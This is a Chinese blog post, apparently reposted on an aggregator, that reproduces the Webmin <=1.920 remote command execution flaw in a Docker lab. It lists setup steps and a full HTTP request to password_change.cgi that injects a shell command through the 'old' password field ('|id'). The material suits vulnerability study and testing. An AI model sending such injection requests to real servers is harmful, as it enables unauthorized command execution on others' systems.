• Webmin<=1.920 RCE 漏洞复现


    0x00 前言


    本来前一阵就想复现来着,但是官网的版本已经更新了,直到今天才发现Docker上有环境,才进行了复现

    0x01影响版本


    Webmin<=1.920

    0x02 环境搭建

    docker search webmin 
    docker pull piersonjarvis/webmin-samba
    docker run -d -p 10000:80 piersonjarvis/webmin-samba

    访问你的ip:10000即可访问1.920版本的webmin

    使用账号密码:root/webmin登录到后台

    开启密码重置功能:

    Webmin--Webmin confuration--Authentication

     

    0x03 漏洞利用


    经过长时间的寻找,未找到修改密码的接口,所以随便抓个包手动构造了一个,数据包如下:

    POST /password_change.cgi HTTP/1.1
    Host: 136.244.xx.xx:10000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://136.244.xx.xx:10000/passwd/index.cgi?xnavigation=1
    X-PJAX: true
    X-PJAX-Container: [data-dcontainer]
    X-PJAX-URL: passwd/edit_passwd.cgi?user=root
    X-Requested-From: passwd
    X-Requested-From-Tab: webmin
    X-Requested-With: XMLHttpRequest
    Content-Type: text/plain;charset=UTF-8
    Content-Length: 49DNT: 1
    Connection: close
    
    ​user=laemon&old=123123|id&new1=123456&new2=123456
    
     

    最终执行命令成功

     

    参考文章:

    https://paper.seebug.org/1019/

    更多最新复现内容,请关注公众号Timeline Sec

    欢迎关注公众号Timeline Sec
  • 相关阅读:
    experss路由工作原理
    mongoose学习参考
    express+nodejs 个人博客
    HTML5-CSS3学习20150410(一)
    js学习20150420(七)
    js学习20150401(六)
    js学习20150401(五)
    js学习20150401(四)
    【荐】使用eval()、new Function()将JSON字符串转换为JSON对象
    HTML5 Canvas核心技术—图形、动画与游戏开发.pdf7
  • 原文地址:https://www.cnblogs.com/paperpen/p/11442532.html
走看看 - 开发者的网上家园